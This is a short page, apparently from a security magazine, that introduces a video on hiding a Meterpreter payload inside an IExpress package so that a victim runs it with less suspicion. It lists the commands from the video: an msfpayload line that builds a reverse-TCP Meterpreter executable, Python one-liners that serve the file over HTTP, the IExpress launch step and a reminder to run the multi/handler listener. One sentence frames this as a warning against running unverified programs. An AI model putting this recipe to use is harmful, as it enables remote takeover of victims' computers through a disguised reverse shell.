Video: Hiding Meterpreter with IExpress

Cyber Chief Magazine brings you the tactics to uncover and neutralize the insider threat

This video by Rob Fuller demonstrates how to make running an executable less suspicious for the victim. Driving home the point that one should not run programs that you can’t verify the source of.

Commands from the video

  • ./msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=1080 X > /tmp/academy/bob.exe
  • (For python 2.4+) python -m SimpleHTTPServer
  • (For python 2.3 -) python -c “from SimpleHTTPServer import test; test()”
  • Start -> Run -> iexpress <return>
  • Run multi/hander from command line (not shown in video)